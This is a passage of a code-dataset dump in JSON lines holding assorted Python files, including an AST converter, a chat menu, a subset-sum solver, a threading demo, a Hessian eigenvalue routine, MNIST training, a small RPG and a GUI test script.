type_name = type(target).__name__\n fields: List[ast.Field] = []\n\n if is_builtin_type(target):\n # Builtin-type\n if type(target) == bytes:\n return ast.Leaf(type(target).__name__, target.decode())\n else:\n return ast.Leaf(type(target).__name__, str(target))\n\n for chname, chval in python_ast.iter_fields(target):\n if chname == \"ctx\":\n # ctx is omitted\n continue\n\n is_list = isinstance(chval, list)\n if chval is None:\n continue\n\n if is_list:\n if len(chval) == 0:\n base_type = python_ast.AST.__name__\n is_leaf = False\n else:\n base_type = base_ast_type(chval[0]).__name__\n is_leaf = is_builtin_type(chval[0])\n\n if is_leaf:\n parent_type = f\"{base_type}__list\"\n else:\n parent_type = base_type\n\n elements: List[ast.Node] = []\n for i, elem in enumerate(chval):\n c = to_ast(elem)\n if isinstance(c, ast.Leaf):\n c = ast.Node(\n parent_type, [ast.Field(\"token\", base_type, c)])\n elements.append(c)\n fields.append(ast.Field(chname, parent_type, elements))\n else:\n base_type = base_ast_type(chval).__name__\n fields.append(ast.Field(chname, base_type,\n to_ast(chval)))\n return ast.Node(type_name, fields)\n","sub_path":"nl2prog/language/python/python_ast_to_ast.py","file_name":"python_ast_to_ast.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"185823469","text":"from Pychat.database.checkdestination import check_destination\nfrom Pychat.database.get_messages import get_messages\nfrom Pychat.database.update_msg_status import update_msg_status\nfrom Pychat.exceptions import InvalidChoiceException\n\nfrom Pychat.functionality.new_chat import new_chat\n\n'''CHAT MODULE '''\ndef check_my_chats(usr):\n f=True\n while(f==True):\n sender=get_messages(usr)\n count=len(sender)\n li=[]\n ct=[]\n chat_no=''\n ''' for i in sender.keys():\n Sender Number/Name\n li.append(i)\n #Count of respective Unread messages\n ct.append(sender[i])'''\n\n for i in range(0,count):\n print (i)\n #msg=check_destination(li[i])\n #if(ct[i]==0):\n # print(i+1,\".\",msg.get_dis_name())\n #else:\n # print(i+1,\".\",msg.get_dis_name(),\"[\",ct[i],\"]\")\n print(sender)\n print((count+1),\". New Chat\")\n print((count+2),\". Exit\\n\")\n choice=raw_input()\n try:\n choice=int(choice)\n except ValueError:\n raise InvalidChoiceException()\n if(choice<=count):\n chat_no=li[choice-1]\n new_chat(usr,chat_no)\n update_msg_status(usr,str(chat_no))\n check_my_chats(usr)\n f=False\n elif(choice==count+1):\n\n new_chat(usr)\n check_my_chats(usr)\n f=False\n\n update_msg_status(usr,str(chat_no))\n elif(choice==count+2):\n f=False\n else:\n print(\"Enter a valid option\")","sub_path":"Pychat/functionality/check_my_chats.py","file_name":"check_my_chats.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"298436588","text":"\"\"\"\nSolução dinamica do subset sum\n\"\"\"\n\ndef subset_sum_dinamico(lista, capacidade):\n def subset_sum(lista, capacidade, storage=()):\n for _ in lista:\n if not lista:\n return False\n if lista[0] == capacidade:\n return list(storage + (lista[0],))\n storage = storage + (lista[0],)\n capacidade = capacidade - lista[0]\n lista = lista[1:]\n while True:\n result = subset_sum(lista, capacidade)\n if result == False or result == None:\n lista = lista[1:]\n else:\n return result\n##########################################################################\n##########################################################################\n\ndef red(str):\n return '\\033[91m' + str + '\\033[0m'\n\n\ndef main():\n print(\n \"\"\"\n Gilberto Charles Silveira Araújo - 1512130109\n Erika Bianca Csan - 1612082057\n\n Entre com a {capacidade}, enter, e em seguida, a {lista}, com itens separados por espaços:\n \"\"\"\n .format(\n capacidade=red('capacidade'),\n lista=red('lista')))\n\n capacidade = int(input('\\t{capacidade}'.format(capacidade=red('capacidade ')))) # Entrada da capacidade\n\n # Pré otimização: Eu já recebo a lista de forma ordenada\n lista = sorted(\n list(map(int, input('\\t{lista}'.format(lista=red('lista '))).split(\" \"))))\n\n # Pré otimização: Com a lista ordenada, eu crio uma nova lista sem os\n # itens maiores que a capacidade\n if lista[len(lista) - 1] > capacidade:\n lista = lista[0:next(i for i, x in enumerate(lista) if x > capacidade)]\n\n # Agora sim, eu chamo minha função\n subconjunto = subset_sum_dinamico(lista, capacidade)\n print(\n \"\"\"\n {resposta} {subconjunto}\n \"\"\".format(\n resposta=red(\n 'Subconjunto encontrado:'),\n subconjunto=subconjunto\n ))\n\nif __name__ == \"__main__\":\n main()","sub_path":"2020_1/analise_de_algoritmo/correcaoa1/gilberto_araujo/subset_sum_dinamico.py","file_name":"subset_sum_dinamico.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"264627803","text":"import threading\nimport time\nimport random\n\n_queue = [] # NOT THREAD SAFE\nMAX_ITEMS = 10\ncondition = threading.Condition()\n\n\nclass ProducerThread(threading.Thread):\n def run(self):\n numbers = range(MAX_ITEMS) # Generate num in 0..5\n global _queue # Global queue\n\n while True:\n condition.acquire()\n if len(_queue) >= MAX_ITEMS:\n print(\"Queue is full, producer is waiting\")\n condition.wait() # If full, just wait\n print(\"Space in queue, Consumer notified producer\")\n number = random.choice(numbers)\n _queue.append(number)\n print(\"Produced {}, queue: {}\".format(number, _queue))\n condition.notify() # Notify consumers\n condition.release()\n time.sleep(random.random())\n\n\nclass ConsumerThread(threading.Thread):\n def run(self):\n global _queue\n while True:\n condition.acquire()\n if not _queue:\n print(\"Nothing in queue, consumer is waiting\")\n condition.wait()\n print(\"Producer added something to queue and notified consumer\")\n number = _queue.pop(0)\n print(\"Consumed {}, queue: {}\".format(number, _queue))\n condition.notify() # Notify producer\n condition.release()\n time.sleep(random.random())\n\nif __name__ == \"__main__\":\n producer = ProducerThread()\n producer.daemon = True\n producer.start()\n\n consumer = ConsumerThread()\n consumer.daemon = True\n consumer.start()\n\n producer.join()\n consumer.join()","sub_path":"pure_python_part/consumer_producer_conditional_mutex.py","file_name":"consumer_producer_conditional_mutex.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"652344047","text":"\"\"\"\n compute hessian vector products as well as eigenvalues of the hessian\n # copied from https://github.com/tomgoldstein/loss-landscape/blob/master/hess_vec_prod.py\n # code re-written to use gpu by default and then to use gpytorch\n\"\"\"\n\nimport torch\nimport time\nimport numpy as np\nfrom torch import nn\nfrom torch.autograd import Variable\n\nfrom gpytorch.utils.lanczos import lanczos_tridiag, lanczos_tridiag_to_diag\n\nfrom hess.utils import flatten, unflatten_like, eval_hess_vec_prod, gradtensor_to_tensor\n\n################################################################################\n# For computing Eigenvalues of Hessian\n################################################################################\ndef min_max_hessian_eigs(net, dataloader, criterion,\n n_top_eigs=3, n_bottom_eigs=50, use_cuda=False):\n \"\"\"\n Compute the largest and the smallest eigenvalues of the Hessian marix.\n Args:\n net: the trained model.\n dataloader: dataloader for the dataset, may use a subset of it.\n criterion: loss function.\n use_cuda: use GPU\n \"\"\"\n\n params = [p for p in net.parameters() if len(p.size()) > 1]\n N = sum(p.numel() for p in net.parameters())\n p = next(iter(net.parameters()))\n mask = torch.ones(N, dtype=p.dtype, device=p.device)\n \n def hess_vec_prod(vec):\n padded_rhs = torch.zeros(N, vec.shape[-1],\n device=vec.device, dtype=vec.dtype)\n padded_rhs[mask==1] = vec\n \n print(\"vec shape = \", vec.shape)\n print(\"padded shape = \", padded_rhs.shape)\n hess_vec_prod.count += 1 # simulates a static variable\n padded_rhs = unflatten_like(padded_rhs.t(), net.parameters())\n\n start_time = time.time()\n eval_hess_vec_prod(padded_rhs, net=net, criterion=criterion,\n dataloader=dataloader,\n use_cuda=use_cuda)\n prod_time = time.time() - start_time\n out = gradtensor_to_tensor(net, include_bn=True)\n \n sliced = out[mask==1].unsqueeze(-1)\n print(\"sliced shape = \", sliced.shape)\n return sliced\n\n hess_vec_prod.count = 0\n\n # use lanczos to get the t and q matrices out\n pos_q_mat, pos_t_mat = lanczos_tridiag(\n hess_vec_prod,\n n_top_eigs,\n device=params[0].device,\n dtype=params[0].dtype,\n matrix_shape=(N, N),\n )\n # convert the tridiagonal t matrix to the eigenvalues\n pos_eigvals, pos_eigvecs = lanczos_tridiag_to_diag(pos_t_mat)\n\n pos_eigvecs = pos_q_mat @ pos_eigvecs\n\n # If the largest eigenvalue is positive, shift matrix so that any negative eigenvalue is now the largest\n # We assume the smallest eigenvalue is zero or less, and so this shift is more than what we need\n # shift = maxeig*.51\n shift = 0.51 * pos_eigvals.max().item()\n print(\"Pos Eigs Computed....\\n\")\n\n def shifted_hess_vec_prod(vec):\n hvp = hess_vec_prod(vec)\n return -hvp + shift * vec\n\n\n # now run lanczos on the shifted eigenvalues\n neg_q_mat, neg_t_mat = lanczos_tridiag(\n shifted_hess_vec_prod,\n n_bottom_eigs,\n device=params[0].device,\n dtype=params[0].dtype,\n matrix_shape=(N, N),\n )\n neg_eigvals, neg_eigvecs = lanczos_tridiag_to_diag(neg_t_mat)\n neg_eigvecs = neg_q_mat @ neg_eigvecs\n print(\"Neg Eigs Computed...\")\n print(\"neg eigs = \", neg_eigvals)\n \n\n neg_eigvals = -neg_eigvals + shift\n\n\n #return maxeig, mineig, hess_vec_prod.count, pos_eigvals, neg_eigvals, pos_bases\n return pos_eigvals, pos_eigvecs, neg_eigvals, neg_eigvecs\n","sub_path":"experiments/cifar-loss-surfaces/min_max_evals.py","file_name":"min_max_evals.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"184827760","text":"#!/usr/bin/env python3\n\n\"\"\"\nIn this simple RPG game, the hero fights the goblin. He has the options to:\n\n1. fight goblin\n2. do nothing - in which case the goblin will attack him anyway\n3. flee\n\n\"\"\"\n#Step 6\nclass Character:\n def __init__(self,name, health, power):\n self.name = name\n self.health = health\n self.power = power\n#Step 7\n def alive(self):\n if self.health > 0:\n return True\n\n#Step 7 - Challenge\n def attack(self, enemy):\n enemy.health -= self.power\n\n\n def print_status(self):\n print(\"{} have {} health and {} power.\".format(self.name, self.health, self.power))\n\n#Step 1\nclass Hero(Character):\n def attack(self, goblin):\n super().attack(goblin)\n print(\"You do {} damage to the goblin.\".format(self.power))\n if goblin.health <= 0:\n print(\"The goblin is dead.\")\n\n def attackz(self, zombie):\n super().attack(zombie)\n print(\"You do {} damage to the zombie.\".format(self.power))\n print(\"He is still alive, better flee\")\n\n\nclass Goblin(Character):\n def attack(self, hero):\n super().attack(hero)\n print(\"The goblin does {} damage to you.\".format(goblin.power))\n if hero.health <= 0:\n print(\"You are dead.\")\n\nclass Zombie(Character):\n def attack(self, hero):\n super().attack(hero)\n print(\"The zombie does {} damage to you.\".format(zombie.power))\n if hero.health <= 0:\n print(\"You are dead.\")\n\nhero = Hero('You', 10, 2)\ngoblin = Goblin('Goblin', 6, 2)\nzombie = Zombie('Zombie', 1, 1)\n\ndef main():\n while goblin.alive() and hero.alive():\n hero.print_status()\n goblin.print_status()\n # zombie.print_status()\n print()\n print(\"What do you want to do?\")\n print(\"1. fight goblin\")\n print(\"2. do nothing\")\n print(\"3. flee\")\n print(\"4. fight zombie\")\n print(\"> \", end=' ')\n inpt = input()\n if inpt == \"1\":\n hero.attack(goblin)\n\n if goblin.health > 0:\n goblin.attack(hero)\n elif inpt == \"2\":\n if goblin.health > 0:\n goblin.attack(hero)\n elif inpt == \"3\":\n print(\"Goodbye.\")\n break\n elif inpt == \"4\":\n hero.attackz(zombie)\n\n if zombie.health > 0:\n zombie.attack(hero)\n else:\n print(\"Invalid inpt {}\".format(inpt))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"clearhero.py","file_name":"clearhero.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"401967034","text":"import numpy as np\nimport sounddevice as sd\nimport pywt as wt\nimport math\nimport struct\nimport zlib\ntry:\n import argcomplete # completion for argparse.\nexcept ImportError:\n print(\"Unable to import argcomplete\")\nimport minimal\nimport buffer\nimport compress\nimport br_control\nimport intra_frame_decorrelation\n\nclass Temporal_decorrelation(intra_frame_decorrelation.Intra_frame_decorrelation):\n def __init__(self):\n if __debug__:\n print(\"Running Intra_frame_decorrelation.__init__\")\n filters_name = \"db5\"\n self.wavelet = wt.Wavelet(filters_name)\n self.levels = 3\n self.signal_mode_extension = \"per\"\n self.precision_type = np.int32 \n super().__init__()\n \n def pack(self, chunk_number, chunk):\n decomposition = self.DWT(chunk)\n quantized_decomposition = []\n for subband in decomposition:\n quantized_subband = self.quantize(subband)\n quantized_decomposition.append(quantized_subband)\n \n packed_chunk = super().pack(chunk_number, quantized_decomposition)\n return packed_chunk\n\n def unpack(self, packed_chunk, dtype=minimal.Minimal.SAMPLE_TYPE):\n chunk_number, decomposition = super().unpack(packed_chunk, dtype)\n \n dequantized_decomposition = []\n for subband in decomposition:\n dequantized_subband = self.dequantize(subband)\n dequantized_decomposition.append(dequantized_subband)\n \n dwted_chunk = iDWT(dequantized_decomposition)\n return chunk_number, dwted_chunk\n \n def DWT(self, chunk):\n return wt.wavedec(chunk, wavelet=self.wavelet, level=self.levels, mode=self.signal_mode_extension)\n #return np.around(wt.coeffs_to_array(coeffs_in_subbands)[0]).astype(self.precision_type)\n\n def iDWT(self, coeffs_in_array):\n return wt.array_to_coeffs(coeffs_in_array, wavelet=self.wavelet, mode=self.signal_mode_extension)\n #return np.around(wt.waverec(coeffs_in_subbands, wavelet=self.wavelet, mode=self.padding)).astype(self.precision_type) \n\nif __name__ == \"__main__\":\n minimal.parser.description = __doc__\n try:\n argcomplete.autocomplete(minimal.parser)\n except Exception:\n if __debug__:\n print(\"argcomplete not working :-/\")\n else:\n pass\n minimal.args = minimal.parser.parse_known_args()[0]\n intercom = Temporal_decorrelation()\n try:\n intercom.run()\n except KeyboardInterrupt:\n minimal.parser.exit(\"\\nInterrupted by user\")","sub_path":"2021/G2/temporal.py","file_name":"temporal.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"449412321","text":"import torch.nn as nn\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom torch.optim import lr_scheduler\nimport torchvision\nimport torchvision.transforms as transforms\nimport os\nfrom models.conv import MnistModel\nfrom settings import *\n\n# Training\ndef train(epoch):\n print('\\nEpoch: %d' % epoch)\n scheduler.step()\n net.train()\n train_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(trainloader):\n inputs, targets = inputs.to(device), targets.to(device)\n optimizer.zero_grad()\n outputs = net(inputs)\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n\n train_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n acc = 100. * correct / total\n print('train acc: %.2f' % acc)\n\ndef test(epoch):\n global best_acc\n net.eval()\n test_loss = 0\n correct = 0\n total = 0\n with torch.no_grad():\n for batch_idx, (inputs, targets) in enumerate(testloader):\n inputs, targets = inputs.to(device), targets.to(device)\n outputs = net(inputs)\n loss = criterion(outputs, targets)\n\n test_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n # Save checkpoint.\n acc = 100.*correct/total\n print('valid acc: %.2f' % acc)\n if acc >= best_acc:\n print('update resnet ckpt!')\n state = {\n 'net': net.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n }\n if not os.path.isdir('checkpoint'):\n os.mkdir('checkpoint')\n torch.save(state, MNIST_CKPT)\n best_acc = acc\n\n\nif __name__ == '__main__':\n best_acc = 0 # best test accuracy\n start_epoch = 0 # start from epoch 0 or last checkpoint epoch\n\n # Data\n print('==> Preparing data..')\n transform_train = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n ])\n\n trainset = torchvision.datasets.MNIST(root='./data', train=True, download=True, transform=transform_train)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=BATCH_SIZE_MNIST, shuffle=True,\n num_workers=NUM_WORKERS)\n\n testset = torchvision.datasets.MNIST(root='./data', train=False, download=True, transform=transform_test)\n testloader = torch.utils.data.DataLoader(testset, batch_size=BATCH_SIZE_MNIST, shuffle=False,\n num_workers=NUM_WORKERS)\n\n # Model\n print('==> Building model..')\n net = MnistModel()\n net = net.to(device)\n #\n # if device == 'cuda':\n # net = torch.nn.DataParallel(net)\n # cudnn.benchmark = True\n\n if False:\n # Load checkpoint.\n print('==> Resuming from checkpoint..')\n assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'\n checkpoint = torch.load(MNIST_CKPT)\n net.load_state_dict(checkpoint['net'])\n try:\n best_acc = checkpoint['acc']\n except:\n best_acc = checkpoint['auc_score']\n if best_acc > 90:\n best_acc = best_acc / 100\n print('best_acc: %.2f%%' % (100. * best_acc))\n start_epoch = checkpoint['epoch']\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(net.parameters(), lr=LEARNING_RATE, momentum=0.9, weight_decay=5e-4)\n scheduler = lr_scheduler.StepLR(optimizer, step_size=SCHEDULER_STEP_SIZE, gamma=0.1)\n\n for epoch in range(start_epoch, start_epoch+NUM_EPOCHS):\n train(epoch)\n test(epoch)\n\n","sub_path":"mnist_pre_train.py","file_name":"mnist_pre_train.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"27151318","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 4 17:44:50 2019\n\n@author: ouhajime\n\"\"\"\n\nimport xml.dom.minidom\nimport pandas as pd\n\ndef extractData(file_path):\n \"\"\"\n extract data from xml file\n \"\"\"\n \n DOMTree = xml.dom.minidom.parse(file_path)\n collection = DOMTree.documentElement\n \n data = []\n sents = collection.getElementsByTagName(\"sentence\") \n for sent in sents:\n aspectTerms = sent.getElementsByTagName('aspectTerms')\n if len(list(aspectTerms)):\n \n text = sent.getElementsByTagName(\"text\")[0]\n temp = text.childNodes[0].data\n \n aspectTerm = aspectTerms[0].getElementsByTagName(\"aspectTerm\")\n for ap in aspectTerm:\n content = []\n content.append(temp)\n content.append(ap.getAttribute(\"term\"))\n content.append(ap.getAttribute(\"polarity\"))\n data.append(content)\n \n df = pd.DataFrame(data,columns=['text','target','label'])\n df = df[df['label'] != 'conflict']\n \n return df\n\ndef saveData(input_path,save_path):\n df = extractData(input_path)\n df.to_csv(save_path,index=False)\n\nif __name__ == \"__main__\":\n\n saveData('./DATA/Restaurants_Train.xml','./DATA/train.csv')\n saveData('./DATA/restaurants-trial.xml','./DATA/test.csv')\n\n\n\n\n\n\n\n\n","sub_path":"GetData.py","file_name":"GetData.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"450132842","text":"# again!! will do in cpp later.\n\n#!/usr/bin/python3\nnum = 2**1000\nnum_str = str(num)\n\nsum = 0\nfor i in range(len(num_str)) :\n sum = sum + int(num_str[i])\n\nprint(sum)","sub_path":"Problem_16.py","file_name":"Problem_16.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"572888725","text":"import time\r\n\r\ndef print_problem(str_operand, str_result):\r\n\t#menampilkan ke layar persoalan cryptaritmetic\r\n\tfor i in range(len(str_operand)):\r\n\t\tfor j in range(len(str_result)-len(str_operand[i])):\r\n\t\t\tprint(' ', end='')\r\n\t\tprint(str_operand[i])\r\n\tfor i in range(len(str_result)):\r\n\t\tprint('-', end='')\r\n\tprint(' +')\r\n\tprint(str_result)\r\n\r\ndef print_solution(str_operand, str_result, dictionary):\r\n\t#menampilkan ke layar solusi cryptarithmetic\r\n\tx_operand = []\r\n\tfor i in range(len(str_operand)):\r\n\t\tx_operand.append(str(get_value(str_operand[i], dictionary)))\r\n\tx_result = str(get_value(str_result, dictionary))\r\n\tprint_problem(x_operand, x_result)\r\n\r\ndef input_letters(stream, letters):\r\n\t#memasukan huruf dari operand atau hasil ke dalam list letters, sehingga tercipta huruf yang unik\r\n for i in range(len(stream)):\r\n if stream[i] not in letters:\r\n letters = letters + stream[i]\r\n return letters\r\n\r\ndef get_value(stream, dictionary):\r\n\t#mendapatkan nilai dari suatu operand atau hasil berdasarkan kamus / kemungkinan permutasi yang sedang dilakukan\r\n s = ''\r\n for letter in stream:\r\n s += dictionary[letter]\r\n return int(s)\r\n\r\ndef check_format(str_operand, str_result, dictionary):\r\n\t#mengecek apakah huruf pertama dari operand atau hasil ada yang nol, jika ada return False, jika tidak return True \r\n\tif dictionary[str_result[0]] == '0':\r\n\t\treturn False\r\n\telse:\r\n\t\ti = 0\r\n\t\twhile i < len(str_operand): \r\n\t\t\tif dictionary[str_operand[i][0]] == '0':\r\n\t\t\t\treturn False\r\n\t\t\telse :\r\n\t\t\t\ti += 1\r\n\t\treturn True\r\n\r\ndef check_solution(str_operand, str_result, str_first, letters):\r\n\t#mengecek apakah solusi tersebut memenuhi \r\n\tdictionary = dict(zip(letters, '0123456789'))\r\n\tif not letters[0] in str_first and sum(get_value(exp, dictionary) for exp in str_operand) == get_value(str_result, dictionary):\r\n\t\tprint('Cryptarithmetic Solution : ')\r\n\t\tprint_solution(str_operand, str_result, dictionary)\r\n\t\tprint()\r\n\t\treturn True\r\n\telse :\r\n\t\treturn False\r\n\r\n\"\"\"\r\nMembaca data dari file eksternal\r\nOperand dimasukan ke dalam list str_operand\r\nResult dimasukan ke dalam string str_result\r\nHuruf dimasukan ke dalam string letters, lalu diubah menjadi list letters\r\nHuruf pertama dimasukkan ke dalam set str_first\r\n\"\"\"\r\n# data_loading\r\ndata = open('expression.txt', 'r')\r\nstr_operand =[]\r\nletters = ''\r\nstream = data.readline()\r\nwhile '-' not in stream:\r\n stream = stream.replace('\\n', '')\r\n stream = stream.replace('+', '')\r\n stream = stream.replace(' ', '')\r\n str_operand.append(stream)\r\n letters = input_letters(stream, letters)\r\n stream = data.readline()\r\nstream = data.readline()\r\nstream = stream.replace('\\n', '')\r\nletters = input_letters(stream, letters)\t\r\nstr_result = stream\r\ndata.close()\r\nstr_first = []\r\nfor i in range(len(str_operand)):\r\n\tstr_first.append(str_operand[i][0])\r\nstr_first.append(str_result[0])\r\nstr_first= set(str_first)\r\n\r\nfor i in range(10-len(letters)):\r\n letters = letters + '_'\r\n \r\nr_letters = sorted(letters)\r\nr_letters.reverse()\r\nletters = sorted(letters)\r\n\r\n# problem description\r\nprint('Cryptarithmetic Problem : ')\r\nprint_problem(str_operand, str_result)\r\nprint()\r\n\r\n#problem solving\r\nif len(letters) > 10:\r\n\tprint('Cryptarithmetic problem has no solution, n_letters > 10')\r\nelse :\r\n\tsolution = False\r\n\tt0 = time.clock()\r\n\r\n\twhile r_letters != letters:\r\n\t\tif check_solution(str_operand, str_result, str_first, letters):\r\n\t\t\tsolution = True\r\n\t\t\tbreak\r\n\t\ti = len(letters)-1\r\n\t\twhile i > 0 :\r\n\t\t\tif letters[i] > letters[i-1]:\r\n\t\t\t\tj = len(letters)-1\r\n\t\t\t\twhile letters[j]')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)","sub_path":"dogclassifierapp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"441490039","text":"import torch as t\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass SoftDiceLoss(nn.Module):\n def __init__(self):\n super(SoftDiceLoss, self).__init__()\n\n def forward(self, logits, targets):\n smooth = 1\n num = targets.size(0)\n probs = t.sigmoid(logits)\n\n m1 = probs.view(num, -1)\n m2 = targets.view(num, -1)\n intersection = (m1 * m2)\n\n score = 2. * (intersection.sum(1) + smooth) / (m1.sum(1) + m2.sum(1) + smooth) # sum(1) sum by column\n\n score = 1 - score.sum() / num\n\n return score\n\n\nclass DetaLoss(nn.Module):\n def __init__(self):\n super(DetaLoss, self).__init__()\n\n def forward(self, pred, truth):\n points = t.abs(pred - truth)\n # for i in range(len(points)):\n # while points[i][0] > 1 or points[i][1] > 1:\n # points[i][0] /= 2\n # points[i][1] /= 2\n return t.mean(t.mean(points, 0, keepdim=True), 1)\n","sub_path":"ex21-Weights/model/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"334450332","text":"useFixture(default)\r\n\r\ndef test():\r\n\tfrom Modules import commonBits\r\n\tjava_recorded_version = '1.6.0_22'\r\n\r\n\tif window('Record Layout Definitions'):\r\n\t\tclick('*')\r\n\t\tcommonBits.new1(click)\r\n\r\n\t\tselect('RecordDef.Record Name_Txt', 'zxzxzFLDg1')\r\n\t\tselect('RecordDef.Description_Txt', 'Group Test 1')\r\n\t\tclick(commonBits.fl('Insert'))\r\n\r\n\r\n\t\tselect('RecordFieldsJTbl', 'cell:' + commonBits.fl('FieldName') + ',0()')\r\n\t\tcommonBits.delete2(click)\r\n\t\tselect('RecordDef.Record Type_Txt', commonBits.fl('Group of Records'))\r\n\r\n\t\t##select('TabbedPane', 'Child Records')\r\n\t\tclick(commonBits.fl('Insert'))\r\n\r\n\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',0()')\r\n\t\tselect('ChildRecordsJTbl', 'zxzxzFLD1', commonBits.fl('Child Record') + ',0')\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',0(zxzxzFLD1)')\r\n\t\tclick(commonBits.fl('Insert'))\r\n\r\n\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',1()')\r\n\t\tselect('ChildRecordsJTbl', 'zxzxzFLD2', commonBits.fl('Child Record') + ',1')\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',1(zxzxzFLD2)')\r\n\t\tclick(commonBits.fl('Insert'))\r\n\r\n\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',2()')\r\n\t\tselect('ChildRecordsJTbl', 'zxzxzFLD3', commonBits.fl('Child Record') + ',2')\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',2(zxzxzFLD3)')\r\n\t\tassert_p('ChildRecordsJTbl', 'Content', '[[, zxzxzFLD1, , , , , ], [, zxzxzFLD2, , , , , ], [, zxzxzFLD3, , , , , ]]')\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',2(zxzxzFLD3)')\r\n\t\tclick(commonBits.fl('Save As'))\r\n\r\n\r\n\r\n\t\tif window('Input'):\r\n\t\t\tselect('OptionPane.textField', 'zxzxzFLDg2')\r\n\t\t\tclick('OK')\r\n\t\tclose()\r\n\r\n\r\n\t\t##select('TabbedPane', 'Child Records')\r\n\t\tassert_p('ChildRecordsJTbl', 'Content', '[[, zxzxzFLD1, , , , , ], [, zxzxzFLD2, , , , , ], [, zxzxzFLD3, , , , , ]]')\r\n\t\tselect('RecordDef.Description_Txt', 'Group Test 2')\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Name') + ',1()')\r\n\t\tcommonBits.delete2(click)\r\n\t\tassert_p('ChildRecordsJTbl', 'Content', '[[, zxzxzFLD1, , , , , ], [, zxzxzFLD3, , , , , ]]')\r\n\t\tselect('RecordList.Record Name_Txt', 'zxzxzFLDg1')\r\n\r\n\t\t#select('TabbedPane', commonBits.fl('Child Records'))\r\n\t\tselect('RecordList.Description_Txt', '%')\r\n\r\n\t\t##select('TabbedPane', 'Child Records')\r\n\t\tassert_p('ChildRecordsJTbl', 'Content', '[[, zxzxzFLD1, , , , , ], [, zxzxzFLD2, , , , , ], [, zxzxzFLD3, , , , , ]]')\r\n\t\tassert_p('RecordDef.Description_Txt', 'Text', 'Group Test 1')\r\n\t\tassert_p('RecordDef.Record Name_Txt', 'Text', 'zxzxzFLDg1')\r\n\t\tselect('RecordList.Record Name_Txt', 'zxzxzFLDg2')\r\n\r\n\t\t#select('TabbedPane', 'Child Records')\r\n\t\tselect('RecordList.Description_Txt', '%%')\r\n\r\n\t\tselect('TabbedPane', commonBits.fl('Child Records')\r)\r\n\t\tassert_p('ChildRecordsJTbl', 'Content', '[[, zxzxzFLD1, , , , , ], [, zxzxzFLD3, , , , , ]]')\r\n\t\tassert_p('RecordDef.Description_Txt', 'Text', 'Group Test 2')\r\n\t\tassert_p('RecordDef.Record Name_Txt', 'Text', 'zxzxzFLDg2')\r\n\t\tcommonBits.delete3(click)\r\n\t\tif window(commonBits.fl('Delete: zxzxzFLDg2')):\r\n\t\t\tclick('Yes')\r\n\t\tclose()\r\n\r\n\r\n\t\tselect('RecordList.Record Name_Txt', 'zxzxzFLDg1')\r\n\r\n\t\tselect('RecordList.Description_Txt', '%')\r\n\r\n\t\tselect('TabbedPane', commonBits.fl('Child Records')\r)\n\n\t\tassert_p('ChildRecordsJTbl', 'Content', '[[, zxzxzFLD1, , , , , ], [, zxzxzFLD2, , , , , ], [, zxzxzFLD3, , , , , ]]')\r\n\t\tassert_p('RecordDef.Record Name_Txt', 'Text', 